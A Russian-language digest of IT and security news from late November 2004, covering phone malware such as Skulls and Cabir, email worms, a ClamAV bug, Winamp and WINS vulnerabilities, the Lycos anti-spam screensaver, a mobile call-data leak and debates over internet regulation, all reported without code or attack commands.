Вирусописатели нанесли очередной удар по владельцам смартфонов - на свет появилась новая версия трояна Skulls, заражающего мобильные телефоны, находящиеся в непосредственной близости от смартфона зараженного вирусом Cabir. Новая версия Skulls.B появилась всего через неделю после того, как специалисты по борьбе с компьютерными вирусами предупредили о существовании вредоносного кода, получившего название Skulls, поражающего смартфоны на платформах Nokia Series 60 и Symbian. Теперь этот троян получил дополнительную функциональность, поскольку он укомплектован одним из первых вирусов для мобильных телефонов Cabir. В результате смартфон, зараженный Skulls начинает распространять Cabir на другие телефоны через Bluetooth-соединение. "Подцепить" вирус могут любые смартфоны, находящиеся в непосредственной близости от зараженного Skulls телефона. Как отмечают эксперты, код Skulls не распространяется через механизм Cabir, последний же не производит разрушительных действий. Червь Cabir выводит на экран телефона надпись Caribe, внедряется в систему и активизируется при каждой загрузке. После этого Cabir сканирует доступные устройства, использующие технологию передачи данных Bluetooth, выбирает первый из них и пересылает ему свою копию. По данным антивирусной компании F-Secure, воздействию новой троянской программы подвержены телефоны Nokia, Siemens, Panasonic и Sendo, однако представители фирмы Symbian заявляют, что Skulls представляет угрозу только для телефонов на базе платформы Nokia Series 60.
CNews

30/11/2004 15:44 Баг в Clamav при проверке RAR-файлов версии 3
Как сообщил на сайте linux.org.ru McMCC, найден критический баг в сканировании exe файлов после установки патча clamav-libunrar3.patch на Clamav (популярный в мире открытых систем свободный антивирус). Он заключается в том, что после сканирования саморасспаковывающихся exe-архивов созданных RAR 2/3.x не возвращается позиция на начало файла в дескрипторе, соответсвенно следущая проверка не выполняется, так как ей достается конец, что в свою очередь обеспечивает свободное прохождение вирусов. Всем, кто использует данную связку советуют наложить fix на ранние патчи или взять новые версии патча, архивов или rpm пакетов приведенных в статье "Clamav и проверка RAR архивов версии 3".
Описание

30/11/2004 14:28 nthost.ru (Москва): перенос доменов
nthost.ru (специализированное подразделение ЗАО «Фирма ТЕЛ», Москва) извещает о том, что РосНИИРОС прекращает регистрировать домены второго уровня в домене RU. Поэтому с 1-го января 2005-го года будет невозможным продление регистрации доменов, зарегистрированных в РосНИИРОС. Доменные имена, зарегистрированные до указанного срока, будут поддерживаться РосНИИРОС до окончания срока их регистрации. Для дальнейшего обслуживания и оплаты продления регистрации доменов необходимо написать письмо об их переносе в «Гарант-Парк-Телеком» по договору с nthost.ru. Перенос доменов осуществляется бесплатно.
Подробности

30/11/2004 13:44 Хакеры обиделись на Рунет
Как уже сообщалось, на днях в Экспоцентре на Красной Пресне состоялась церемония вручения Национальной Премии российского интернета и праздничная шоу-акция «10RUЛЕТ-show». Неизвестная хакерская группа сегодня атаковала юбилейный сайт 10ru.ru, мотивировав свои действия тем, что организаторы мероприятия не уделили должного внимания хакерскому сообществу. Премией Рунета в 15 номинациях были награждены компании и проекты, чей вклад в развитие Рунета в экономическом и социально-культурном плане был признан наиболее значимым за последние 10 лет. В число награжденных попал и «РосБизнесКонсалтинг». Во время церемонии участники и организаторы не раз нелестно отзывались о хакерах. Очевидно, те не преминули отомстить специфическим образом. Неизвестный злоумышленник вывел на время из строя сайт мероприятия. «Сегодня с утра наш основной сайт 10ru.ru был недоступен, — сообщил корреспонденту Cnews генеральный продюсер Юбилея Рунета Александр Айгистов, — причиной этому стала атака хакеров. К вечеру мы восстановим работоспособность нашего ресурса». Владельцам сайта было направлено письмо следующего содержания: "на вашей тусне ни хрена хакерам не отслюнили, а мы вам … сайт … с праздничком интернета!" (нецензурные выражения заменены точками). На момент опубликования этого материала сайт 10ru.ru функционировал в нормальном режиме, однако в старой редакции.
CNews

30/11/2004 13:25 Выход первого тома "Протоколы TCP/IP. В подлиннике"
На сайте books.ru скоро начнётся оформление заказов на недавно выпущенную издательством BHV-СПб знаменитой книги "TCP/IP Illustrated, volume 1. The Protocols" У. Р. Стивенса, выдержавшей четыре издания на английском языке и впервые переведенной на русский. Автором были изданы 3 тома в серии. W. Richard Stevens является признанным экспертом как в ОС UNIX, так и сетях и сетевом программировании. Книга ожидается к появлению на складе 3 декабря. Отпускная цена очень невысокая для подобного, вне всякого сомнения, шедевра, описывающего сетевые технологии, на которых построен современный Интернет - 240 рублей. Для сравнения непереведённая книга этого же автора "UNIX Network Programming, Volume 1: Networking APIs - Sockets and XTI" стоит 1310 рублей (при этом старая цена была 4364 рубля.
О книге

30/11/2004 13:06 Статья о фильтрации спама в почтовой системе Mail.Ru
Почти каждый пользователь электронной почты хотя бы раз получал спам. Реклама виагры и "американского английского", душещипательные письма от принцев в изгнании наряду с предложениями купить остров в Средиземном море или семена конопли - это общая беда и пользователей, и администраторов. Владимир Габриелян, технический руководитель почтовой службы Mail.ru в своей статье рассказывает о фильтрации спама на Mail.ru.
Статья: spamtest.ru

30/11/2004 10:14 Найден новый червь массовой рассылки Attech
Специалисты компании Sophos зафиксировали появление в интернете очередной вредоносной программы. Червь Attech распространяется по электронной почте, через популярные пиринговые сети, в том числе Grokster, KaZaA, Morpheus и Limewire, а также на флоппи-дискетах под видом исполняемых файлов с именами "matrix.exe", "rj3_vc1.exe" и "Speed.exe". После активации червь пытается завершить работу антивирусных программ и приложений, обеспечивающих безопасность, и осуществляет сканирование доступных накопителей в поисках адресов электронной почты. Собранная информация затем используется для составления списка рассылки копий вредоносного кода.
Описание

30/11/2004 09:12 Microsoft отказалась от SP5 для Windows 2000
Microsoft решила не выпускать новый сервисный пакет для Windows 2000, а составить последнее обновление этой ОС главным образом из набора уже выпускавшихся поправок. Компания заявила, что замена сервисного пакета набором поправок позволит заказчикам быстрее обновить свои машины. Выпуск так называемого Update Rollup состоится в середине будущего года, говорится в постинге на веб-сайте Microsoft. «Microsoft беседовала со многими заказчиками об их планах технического обслуживания своих систем Windows 2000, — пишет компания в FAQ на своем сайте. — Чаще всего они просят упростить процесс поддержания актуальности систем Windows 2000 с точки зрения безопасности и уменьшить объем необходимого тестирования перед внедрением (у заказчиков)». В набор войдет меньше исправлений, чем в сервисный пакет, причем большая часть этих исправлений уже выпущена отдельно. Это будет наименее значительный апдейт выпущенной в марте 2000 года Windows 2000, которая все еще широко используется в организациях. Набор исправлений выйдет взамен того, что должно было стать пятым сервисным пакетом для операционной системы. «Microsoft уверена, что Update Rollup лучше отвечает потребностям заказчиков, чем новый сервис-пакет, поэтому Service Pack 5 (SP5) для Windows 2000 не будет, — пишет производитель ПО. — Таким образом, SP4 становится последним сервисным пакетом для Windows 2000». Компания не сказала, что именно войдет в набор обновлений, но пообещала, что он будет содержать «все относящиеся к безопасности обновления, выпущенные для Windows 2000 в период с момента выхода SP4 и до завершения работы над Update Rollup», а также небольшое число обновлений, не относящихся к безопасности.
Подробности

30/11/2004 09:02 Lycos создал скринсейвер для "заваливания" спамерских серверов
Международный интернет-холдинг Lycos объявил о выходе специальной программы-скринсейвера, призванной "дать ответ" спамерам, которые присылают пользователями Интернета по всему миру свои неожиданные коммерческие предложения, cообщает Lenta.Ru. Программа предназначена для создания нагрузки на сайты для приема заказов, указанные в присылаемом спаме. Адреса таких сайтов отбираются в Lycos на основании данных публичных аниспамерских баз наподобие SpamCop.net. Пользователи, установившие скринсейвер ("программу-заставку"), будут в автоматическом режиме получать списки таких серверов, и их компьютер будет время от времени обращаться к серверам спамеров с бессмысленными запросами, создавая, таким образом, нагрузку на них. По замыслу создателей скринсейвера Make Love Not Spam, если им воспользуется досточное число пользователей, из-за возросшей нагрузки спамеры будут вынуждены больше платить провайдерам, услугами которых пользуются. Продажи при этом не возрастут, и, возможно, некоторым спамерам придется закрыть бизнес. В Lycos полагают, что новая программа является уникальной для настоящего времени возможностью для массового пользователя, страдающего от спама, дать спамерам какой-либо ответ, не нарушая при этом "рамки приличия" и не обращаясь к спамерам или их провайдерам с личным посланиями (как правило, эмоциональные письма в адрес спамеров или попытки ответно их заспамить эффекта не имеют; кратковременный эффект способно дать лишь обращение к провайдеру спамера, однако это действует не всегда). Как сообщает BBC News, разработчики заявляют, что их скринсейвер в активном состоянии генерирует около 3-4 мегабайт трафика в день, что равно примерно одному MP3-файлу. В случае, если скринсейверы запустит достаточное число людей по всему миру, на серверы спамерских магазинов будет создана существенная нагрузка, и они, скорее всего, будут почти неспособны принимать заказы, что сделает бизнес спамеров нерентабельным (данный сценарий является вариантом классического хакерского приема под названием "DDoS-атака"). Скринсейвер можно скачать бесплатно, регистрация на портале Lycos не требуется.
Сайт скринсейвера

29/11/2004 17:14 "БиЛайн" подозревает сотрудников в продаже секретов
Как сообщалось, cотрудники Управления "К" МВД РФ при содействии подразделений, обеспечивающих безопасность компании «ВымпелКом», задержали группу подозреваемых в незаконной продаже в Сети сведений о входящих и исходящих звонках пользователей сотовой связи, в том числе, и абонентов «БиЛайна». В незаконном распространении конфиденциальной информации подозреваются теперь уже бывшие сотрудники компании, а также продавцы с Митинского рынка. Летом этого года в Сети появился сайт Sherlok.ru, на котором предлагались платные услуги по предоставлению детальной информации о входящих и исходящих звонках абонентов сотовых сетей, в частности, «БиЛайна», а также их персональных данных. Как рассказала корреспонденту CNews Юлия Остроухова, пресс-секретарь "ВымпелКома", сотрудники дирекции безопасности «ВымпелКома» обнаружили этот сайт в июне 2004 года, после чего сразу началась предварительная проверка источника и, обобщив все данные, передали информацию в Управление "К". Было возбуждено уголовное дело и начато расследование, в ходе которого установили группу лиц, предположительно, причастную к преступлению. По словам начальника пресс-службы Управления "К" Анатолия Платонова, сотрудники управления сумели «вовремя подключиться и нейтрализовать преступную группу, задержав основных ее фигурантов». Как отметила г-жа Остроухова, организатора поймали с поличным во время проведения контрольной закупки. Затем была восстановлена вся цепочка злоумышленников, их задержали. «В списке подозреваемых – двое теперь уже бывших сотрудников «ВымпелКома», работники call-центров, те сотрудники, которые имеют доступ к такого рода информации по долгу службы для оперативного предоставления информации нашим клиентам», - отметила пресс-секретарь "ВымпелКома". Всего подозреваемых семь человек, некоторые из них являются работниками Митинского рынка. Злоумышленники продавали информацию о входящих и исходящих звонках не только абонентов «БиЛайна», но и конкурирующих сетей – МТС и "Мегафона". Тем не менее, заслуга их поимки принадлежит исключительно "ВымпелКому". «О наших коллегах из других сетей ничего не могу сказать, - отметила Юлия Остроухова. - В данной операции с правоохранительными органами сотрудничали представители «ВымпелКома». Мы, собственно, сами же и обратились в Управление "К" после того, как сайт, где представлялись данные о клиентах всех сотовых операторов, был обнаружен нами. Как и любое добропорядочное и законопослушное лицо, мы сообщили о противоправной деятельности в соответствующие органы, тем самым оберегли от посегательств на личные права и свободы как клиентов «ВымпелКома», так и вообще всех граждан, пользующихся сотовой связью, которых миллионы по России».
CNews

29/11/2004 16:51 Intel выпустила пакет программ для производителей ПК с ОС Linux
Корпорация Intel выпустила пакет программ Quick Start Kit for Linux, предназначенный для азиатских производителей ПК, сообщает Info World. На первом этапе Quick Start Kit for Linux будет бесплатно предлагаться компаниям-участникам программы Intel Channel Program в Китае и Индии, так как в этих странах очень высок спрос на ОС Linux в образовательных и правительственных учреждениях. Впоследствии компания планирует вывести набор программ и на другие рынки. Пакет поддерживает дистрибутивы Novell Linux Desktop 9, Red Hat Desktop и Red Flag Desktop 4.1. В следующей версии пакета будет добавлена поддержка дистрибутива Linux китайской компании Standard Software. В состав пакета входят драйверы устройств для Linux, а также программа, позволяющая системным интеграторам устанавливать драйверы автоматически. Программный пакет утвержден для использования с некоторыми материнскими платами Intel и содержит Application Version Compliance - инструмент, помогающий определить сертифицировано ли устанавливаемое ПО для работы с дистрибутивами Linux и материнскими платами Intel.
"Компьюлента"

29/11/2004 13:17 Интервью со специалистом по борьбе с компьютерными преступлениями
На сайте bugtraq.ru опубликовано интересное интерьвью (mindw0rk) с Веховым Виталием Борисовичем, специалистом по борьбе с преступлениями в сфере высоких технологий.
Вот некоторые из вопросов:
- Если государство и органы внутренних дел настолько могущественны, почему им не удалось до сих пор закрыть http://forum.carderplanet.com?
- В США при расследовании компьютерных преступлений нередко используется тактика «подсадной утки». Сотрудники спецслужб анонимно заходят на хакерские IRC-каналы и форумы, наблюдают за ходом дискуссий, пытаются разговорить завсегдатаев. Занимаются ли российские спецслужбы подобным?
- За какие преступления в сфере IT в нашей стране предусмотрены самые суровые наказания, и какие обычно ограничиваются небольшими штрафами?
- В США действуют системы глобального слежения (Carnivore и Echelon), которые мониторят трафик в интернете. Благодаря им недавно удалось задержать 9 человек, якобы причастных к терроризму. Есть ли подобные системы в русскоязычном сегменте сети?
Подробнее:bugtraq.ru

29/11/2004 12:48 Настройка безопасности Windows XP
На сайте bezpeka.com опубликована довольно интресная статья Владимира Безмалого, посвящённая настройкам системы безопасности ОС Windows XP. Как пишет сам автор,"данная статья предназначена в первую очередь для консультантов, специалистов в сфере безопасности, системных разработчиков и специалистов по информационным технологиям, ответственных за планирование инфраструктуры, использование приложений и развертывание рабочих станций под управлением Windows XP в корпоративной ИТ-инфраструктуре". Cтатья в формате MS Word, в заархивированном виде занимает около 290 КБайт.
Cтатья

29/11/2004 12:18 Новый вирус ввергает компьютер в панику
Компания Symantec зафиксировала появление в Интернете очередного вируса, распространяющегося по электронной почте и инфицирующего компьютеры под управлением операционных систем Microsoft Windows. После запуска червь Yanz выводит на экран диалоговое окно с заголовком "WINDOWS PANIC" и текстом "No Windows. Yes doors and holes", что можно перевести как "Окон нет. Есть только черные ходы и дыры". Затем червь создает на жестком диске несколько своих копий, регистрируется в ключе автозапуска реестра и осуществляет массовую рассылку вредоносного кода по всем найденным на инфицированной машине адресам электронной почты при помощи встроенного SMTP-сервера.
Crime-Research.ru

29/11/2004 12:08 Обнаружен новый троян Cod
Сотрудники компании Sophos, специализирующейся на вопросах компьютерной безопасности, зафиксировали появление нового трояна Cod, сообщает "Компьюлента". Эта вредоносная программа поражает компьютеры с операционными системами Microsoft Windows. После неосторожного запуска владельцем машины Cod регистрируется в реестре и соединяется с одним из IRC-серверов, открывая "черный ход" в систему. При помощи трояна злоумышленники теоретически могут получить несанкционированный доступ к удаленному ПК. Впрочем, согласно классификации Sophos, большой угрозы для пользователей Сети вредоносная программа не представляет.
Описание

29/11/2004 11:25 Власти пытаются заполучить логи у создателя Nmap
Создатель известного хакерского инструмента утверждает на своем веб-сайте Insecure.org, что ФБР пытается извлечь данные из его веб-сервера, cобщает ZDNet. Фёдор (Fyodor), как его называют, — хорошо известная фигура в мире компьютерной безопасности. В своем блоге он пишет, что власти обращались к нему за информацией, но не назвали причин такого интереса. Nmap, open-source программа отображения топологии сети, предназначалась для секьюрити-экспертов и помогает им сканировать сети, службы и приложения. Однако хакеры используют этот инструмент в преступных целях, что Фёдору, по его словам, не нравится. «Можно спорить о том, хорошо или плохо помогать ФБР. Они могут охотиться за спамерами, кибервымогателями, инициаторами DDoS-атак и т.п. В этом случае я желаю им успеха. Nmap предназначался для усиления безопасности — преступники и спамеры позорят мою работу!» Фёдор говорит, что ФБР, по его мнению, хочет заполучить его веб-логи для выслеживания злоумышленников. В его сообщении говорится: «Агенты ФБР со всей страны обращаются ко мне за данными логов веб-сервера Insecure.Org. Они не называют причин, но обычно разыскивают какого-нибудь преступника, который, по их мнению, мог посещать страницу Nmap. До сих пор я им ничего не давал. Иногда они обращаются слишком поздно, и данные уже стерты. В других случаях они не могут предъявить надлежащим образом оформленный ордер. А иногда пытаются просить данные без ордера и отстают, когда я его требую». Секьюрити-эксперт добавил, что он старается защитить тайну частной информации от посягательств Федерального бюро расследований. «Я буду стараться отклонять слишком широкие требования (такие как просьба представить веб-логи за целый месяц. Мне важно защитить тайну вашей информации, но пользователи Nmap должны понимать, что любая деятельность в сети оставляет [sic] следы. Я не единственный, к кому обращаются с такими запросами — крупные ISP и провайдеры веб-почты получают их каждый день».
Подробности

29/11/2004 10:54 Novell может помешать Sun в публикации исходного кода Solaris ?
На сайте Linuxbusinessweek опубликована довольно любопытная заметка, смысл которой сводится к тому, что компания Novell несколько удивлена решением Sun опубликовать исходный код ОС Solaris 10. "Интересно узнать, на какой лицензии будет опубликован исходный код ОС Solaris, поскольку исходный код самой Solaris основан на коде UNIX, правом на которую и патентами обладает Novell" - сказал CEO Novell Jack Messman. Занятно, что код Unix также считает своим и SCO.
Оригинальная статья

29/11/2004 10:35 Мэр Москвы Юрий Лужков призывает ввести контроль за Интернетом
На сайте газеты "Известия" в рамках комментария к дискуссии о развитии глобальной сети опубликована статья мэра Москвы Юрия Лужкова о его видении путей развития Интернета. Суть статьи сводится к необходимости государственного контролирования Интернета (по крайней мере - его российского сегмента). Часть высказываний не вызывает никаких возражений (например, проблема борьбы со спамом и распространение детской порнографии), однако некоторые моменты комментария под названием "Дырки в "паутине" вызвали вполне обоснованные нарекания от рядовых пользователей Интернет. "Пора покончить с иллюзиями, что для интернета благо оставаться полностью неконтролируемым информационным пространством", - пишет господин Лужков.
Cтатья

29/11/2004 09:31 Глава Федерального агентства по печати и массовым коммуникациям против регламентирования интернета
Руководитель Федерального агентства по печати и массовым коммуникациям Михаил Сеславинский выступает против регламентирования интернета. "Я сторонник все-таки либеральной позиции", - заявил он в прямом эфире радиостанции "Эхо Москвы". "Эта позиция заключается в том, что интернет - это виртуальный мир, такой же, как в котором мы существуем, только более доступный", - пояснил Сеславинский. "Но каждый человек, который заходит в интернет, создает внутри этого гигантского мира свой собственный маленький мирок, в значительной степени отражающий интересы, мировоззрение и точку зрения этого человека", - добавил он. Касаясь вопроса о том, что в интернете много эротики и насилия, Сеславинский отметил, что пользователи глобальной сети сами виноваты в этой ситуации, так как на подобные сайты никто заходить не заставляет. При этом Сеславинский добавил, что по вопросу регламентирования интернета существуют разногласия даже в структурах агентства. Сеславинский также отверг возможность ограничения доступа граждан страны к интернету, как это, например, сделано в Китае. "Это фундаментальная мировоззренческая позиция. Это был бы другой выбор для развития нашей страны", - отметил он, сообщает РИА "Новости".
РИА "Новости"

28/11/2004 15:18 Интернет не место для злоупотребления возможностями сети
За прошедшие месяцы в Европе возникло целое движение, противодействующее превращению Интернета в рассадник порнографии, в инструмент насаждения у молодежи низменных интересов. Интернет - это эффективный инструмент городского управления, информационной открытости органов власти, интерактивной связи с населением, источник достоверной информации, резерв развития таких важных сфер деятельности, как здравоохранение, образование, социальная помощь. Поэтому крайне важно, чтобы такой информационный ресурс оставался «незамутненным», авторитетным, внушающим доверие. Среди обсуждаемых сейчас в России поправок к Закону о СМИ есть и ясно выраженное намерение включить, наконец, в текст документа ясное и четкое положение об Интернете как о средстве массовой информации. Так что вскоре юристам и просто пользователям сети не придется гадать по поводу того, распространяется в правовом смысле на глобальную сеть пассаж действующего закона - «иные средства массовой информации» - или все-таки нет. Должна появиться юридическая возможность выносить официальные предупреждения сетевым изданиям за размещение информации клеветнического характера, требовать на законном основании ее опровержения. Характерно, что сейчас тема сетевой безопасности фигурирует даже в повестке дня заседаний комиссий СБСЕ, а в Совете федерации ставится вопрос о необходимости уравнять в правах интернет-издания с традиционными СМИ, что позволило бы сетевым журналистам, будучи полноправными членами пишущего сообщества, официально запрашивать информацию в органах власти и иных структурах.
Подробности

28/11/2004 14:15 Мобильных дилеров атакуют клоны
Как стало известно CNews, у «Евросети» в Томске обнаружился нелегальный двойник – сеть, работающая под вывеской «Евросити», использующая дизайн, максимально приближенный к логотипу «настоящей» «Евросети». Впрочем, это не единственный случай, когда известностью крупных сотовых компаний пытаются воспользоваться провинциальные фирмы. Российские мобильные дилеры, к сожалению, имеют достаточно серьезный опыт разбирательств со своими «клонами». И, похоже, это явление становится массовым. «С подобными случаями мы сталкивались не раз: в различных городах (Омске, Ярославле, Тольятти, Новосибирске, Братске) мы встречали «Евросеть», - рассказала CNews менеджер по связям с общественностью «Евросети» Татьяна Гуляева. - Как правило, после нашего выхода на рынок этих городов поддельная "Евросеть" закрывается сама, где-то есть необходимость просто пообщаться с людьми, объяснить их неправоту». По ее словам, часто названия салонов похожи лишь частично, например, сеть "Евросвязь" в городе Иваново, состоящая их 14-ти салонов связи. Но примечательно, что в вывеске недавно появившихся в Томске двух павильонов «Евросити» использованы некоторые элементы фирменного стиля компании «Евросеть». «Сама компания «Евросеть» к «Евростити» не имеет никакого отношения и за оборудование, которое покупатель может приобрести в торговых павильонах «Евросити», ответственности не несет, - заявляет г-жа Гуляева. - Хотя были случаи, когда покупатель введен в заблуждение и только тогда, когда обращается с претензией и поломкой, понимает, что был обманут». Говоря о реакции компании «Евросеть» на данный инцидент, она отметила, что томичи смогли «почувствовать» ее уже с начала недели: руководство компании объявило о существенном снижении цен на телефоны. «Такой ценовой политики «Евросеть» будет придерживаться и впредь», - говорит г-жа Гуляева.
Подробнее

28/11/2004 13:11 Эксплоит уязвимости в Winamp
Опубликован исходный код эксплоита уязвимости, недавно обнаруженной в Winamp. Эксплоит позволяет создать .m3u-файл, который, будучи запущен в Winamp, вызывает переполнение буфера. Единственный нюанс - автор написал, что эксплоит создан для испанской версии WindowsXP SP2.
Эксплоит

28/11/2004 12:58 Уязвимость в WINS
Специалисты из Immunix сообщают о нахождении уязвимости в службе WINS, которая используется в сетях для получения соответствия между NetBIOS именами компьютеров и их IP-адресами. Уязвимость связана с так называемой репликацией WINS, суть которой сводится к обмену информацией между WINS-серверами об обслуживаемыми ими сетями. При процедуре репликации используется TCP-порт 42 и собственный протокол, разработанный Microsoft. Послав специальный пакет к серверу, удалённый атакующий может вызвать переполнение буфера и выполнить произвольный код в системе. Уязвимость присутствует во всех версиях wins.exe. Тестирование проводилось на Windows 2000 SP2-SP4. Обнаружена была ещё в мае. О том, как на это отреагировала Microsoft и была ли она вообще поставлена в известность в тексте нет ни слова. Ниже предлагается подробное описание уязвисмости в виде документа в PDF-формате.
Описание

28/11/2004 12:25 В Великобритании "упали" компьютерные сети правительства
80 тыс. компьютеров правительственного департамента Department for Work and Pensions (DWP), отвечающего за реформы в социальной сфере Великобритании, были выведены из строя из-за проведенной накануне модернизации. Всего «упало» 80% из 100 тыс. настольных компьютеров DWP. «Проблемы были вызваны обычной запланированной модернизацией. Мы работали всю ночь, провели консультации с нашими поставщиками и в настоящее время почти все машины работают», — заявил представитель DWP. Основными поставщиками продуктов и услуг для ИТ-инфраструктуры департамента являются Microsoft и EDS. В Microsoft заявили о том, что им известно о произошедшем и их специалисты принимали участие в решении проблемы. Однако подробностей представители корпорации не сообщили. EDS осуществляет техническую поддержку сети DWP в рамках контракта на сумму £2 млрд. Представители EDS отказались комментировать ситуацию. Это не первый сбой работы ИТ-служб правительства Великобритании. Ранее произошли отказы компьютерной сети агентства Child Support, строительство которой обошлось в £450 млн. и системы Electronic Benefits Transfer ценой £500 млн. Аналитики прогнозируют увеличение количества сбоев информационных систем после прекращения поддержки Windows NT 4.0 со стороны Microsoft, которое ожидается в последних числах декабря 2004 г.
CNews

28/11/2004 12:19 Планы разработчиков браузеров Mozilla и Firefox
Сообщество разработчиков браузера Mozilla объявило, что к середине декабря этого года должна появиться новая версия браузера Mozilla. Со времени выхода Mozilla 1.7 все выходившие обновления являлись лишь исправлениями тех или иных недоработок или уязвимостей в коде Mozilla. На этот раз необходимость выпуска новой версии появилась из-за развития кода Firefox. Многие новшества, присутствующие в Firefox, в Mozilla до сих пор не включены. Разработчики планируют исправить эту ситуацию; Mozilla 1.7.5 должна стать полностью совместимой с Firefox 1.0. Более значительные изменения (в том числе и наращивание функциональности) будут включены лишь в следующий релиз - Mozilla 1.8. Время выхода версии 1.8 пока не объявлено, но на данный момент доступна альфа-версия, причем уже пятая по счету. Разработка Mozilla Firefox также не остановится на версии 1.0. Работа над дальнейшим улучшением браузера уже ведется, и в марте 2005 года должна увидеть свет следующая версия - Firefox 1.1. Далее разработчиками запланирован выход Firefox 1.5, после чего очередь дойдет и до 2.0 (или, возможно, просто Firefox 2). Во второй версии Firefox будет реализовано множество нововведений: улучшенные закладки и история, возможность сохранения отдельных настроек для различных сайтов, улучшенная система расширений, модифицированная строка поиска и, возможно, еще многие интересные вещи.
"Компьюлента"

28/11/2004 11:34 Кто зарабатывает на дырах в безопасности?
Как известно, через дыры в браузере в систему проникают вирусы и шпионские программы. Но эти же дыры используют коммерсанты, которые принудительно устанавливают на компьютер вполне легальное ПО, отсутствующее в антивирусных базах. Один их компьютерных энтузиастов, Бенджамин Эдельман (Benjamin Edelman), отдал немало сил и времени на изучение армии программных «жучков» и «шпионов», которые незаметно устанавливаются в систему через браузер во время серфинга в интернете. По его наблюдениям, в последние месяцы наметилась определенная тенденция: эти программы все чаще используют для проникновения в систему дыры в безопасности, обнаруженные в браузере IE. Эту тенденцию подтверждают и другие исследователи. Что характерно, некоторые из шпионские программ формально являются вполне легальными, а разработчики и руководство компаний категорически отрицает, что для установки используются дыры в безопасности. Такая «поза» помогает им очищать антивирусные базы от упоминания своих продуктов, так что их невозможно обнаружить и уничтожить с помощью антивируса. Поэтому они особенно опасны. Насколько же серьезна данная проблема? Как много шпионских программ способно проникнуть в систему через дыры в безопасности во время обычного серфинга в интернете? Бенджамин Эдельман провел для этого специальное исследование, результаты которого опубликовал в своем блоге.
Более подробно

28/11/2004 11:12 Киберпреступники готовятся к праздничному сезону
Киберпреступники готовятся к сверхурочной работе по мере приближения праздничного торгового сезона. С таким заявлением выступили аналитики Группы противостояния глобальным угрозам в вебе (Global Threat Command Team at Web) и компании SurfControl, занимающейся фильтрацией электронной почты. По данным аналитиков, приведенным Reuters, число посланий мошенников, в которых они просят пользователей сообщить свои идентификационные данные для входа в различные системы, ежемесячно растет на 20-25%. Прежние фишинг-аферы было достаточно легко выявить. Тексты писем изобиловали ошибками, а ссылки в письмах вели на фальшивые сайты, которые значительно отличались от настоящих. Однако все чаще преступники подключают к работе спамеров, хакеров, вирусописателей и веб-дизайнеров и создают с их помощью сложные схемы обмана пользователей. «Праздники - сезон, когда люди особенно легко становятся жертвами таких афер», - заявила представительница SurfControl. Авторы одной из последних фишинг-схем разослали письмо от имени интернет-аукциона eBay. В письме преступники просили подтвердить покупку, сделанную на аукционе через онлайновую платежную систему PayPal. Для такого подтверждения пользователям необходимо было сообщать свои учетные данные в PayPal. Менее опасным видом деятельности киберпреступников стал сбор адресов электронной почты от имени Санта-Клауса. Пользователи получают письма, авторы которых обещают поздравить их детей с Рождеством. В обмен на поздравление почтовые санта-клаусы просят пользователей сообщить свой электронный адрес. По словам Ларсон, никаких поздравлений дети получать не будут. Обещая рождественские подарки, мошенники лишь собирают «живые» электронные адреса.
Viruslist

28/11/2004 10:09 Создатели Symbian не могут отличить «троянца» от несовершенного приложения
Производитель операционной системы Symbian для смартфонов - лондонская компания Symbian - считает преждевременными разговоры о появлении новой троянской программы для своего продукта. По мнению специалистов Symbian, появившаяся недавно программа Trojan.SymbOS.Skuller.a - скорее всего не «троянец», а просто плохо написанное приложение. Сообщения о появлении «троянца» Skuller.a распространились достаточно быстро, однако никаких доказательств того, что Skuller.a может самостоятельно заражать смартфоны, не обнаружено, сообщает сайт eWeek. Более того, пока нет свидетельств того, что программа Skuller.a способна самостоятельно распространяться. Согласно заявлению Symbian и отчетам пользователей, Skuller.a требует установки. Пользователям необходимо пройти несколько этапов, в том числе прочесть несколько предупреждений о возможной угрозе безопасности, чтобы полностью установить Skuller.a. После установки Skuller.a (официальное название - 7610 Extended Theme Manager) заменяет картинки на экране смартфона изображением, похожим на череп и ограничивает функциональность телефона. Смартфон становится простым аппаратом для телефонных звонков. Несмотря на то, что Skuller.a отключает большинство функций смартфона, говорить о том, что это вредоносная программа, преждевременно. По информации Symbian, функции смартфона отключаются, когда программа заменяет картинки черепами и нейтрализует часть меню. «Достаточно странно слышать подобные заявления из уст представителей компании Symbian, - отмечает антивирусный эксперт «Лаборатории Касперского» Александр Гостев. - Не производитель операционной системы определяет вредоносность программы. В случае Skuller.a мы видим очевидную вредоносную программу, способную изрядно испортить жизнь пользователям смартфонов с ОС Symbian. Более того, текстовые строки, найденные в теле этого «троянца», позволяют однозначно утверждать, что Skuller.a создавался именно как вредоносная программа и не является неправильно написанным приложением». С большой долей вероятности можно говорить, что Skuller.a ограничивает функциональность только аппаратов Nokia 7610. В заявлении Symbian говорится, что программа может помешать работе любого смартфона, построенного на платформе Nokia Series 60 и использующего ОС Symbian. Однако информации об ограничении функциональности других аппаратов пока не было.
"Лаборатория Касперского"

27/11/2004 11:45 Gartner: «Берегитесь эксплойта Bofra»
Аналитическая фирма предупреждает, что эксплойт bofra принесет еще много бед. Хакеры все чаще будут пользоваться эксплойтами, встроенными в баннерную рекламу, в качестве средства получения контроля над компьютерами. Аналитическая фирма Gartner прогнозирует, что атаки с применением эксплойта Bofra (buffer overflow frame exploit), или IFRAME, участятся, особенно на нерегулярно обновляемые системы. В распространенном по электронной почте отчете компания пишет: «Gartner убеждена, что атаки этого типа участятся, особенно в процессе перехода — когда на предприятии применяются несколько версий ПО (таких как Windows 2000 и ХР) без полноценной установки исправлений на каждую из платформ». Bofra использует неустраненную уязвимость браузера Internet Explorer 6.0, которая проявляется в Windows 2000 и Windows XP Service Pack 1 (SP1). На компьютеры SP2 этот баг не действует, зато действует на веб-серверы Apache. Gartner рекомендует организациям, использующим веб-серверы Apache, установить исправления как можно скорее. В этом году Gartner публично раскритиковала Microsoft за неспособность надежно защитить компании. «Все мы стали участниками крупнейшего в истории бета-теста под названием Windows. Microsoft никогда не решит всех проблем безопасности, что бы ни говорил самый богатый человек в мире», — заявил вице-президент Gartner Виктор Уитман, выступая на саммите Gartner IT Security в Лондоне. Уитман добавил, что удаление отказавшего ПО во время работы обходится компаниям на 5% дороже, чем поиск ошибок в процессе тестирования.
ZDNet

27/11/2004 11:23 Новый браузер предупредит пользователя о фишинг-атаках
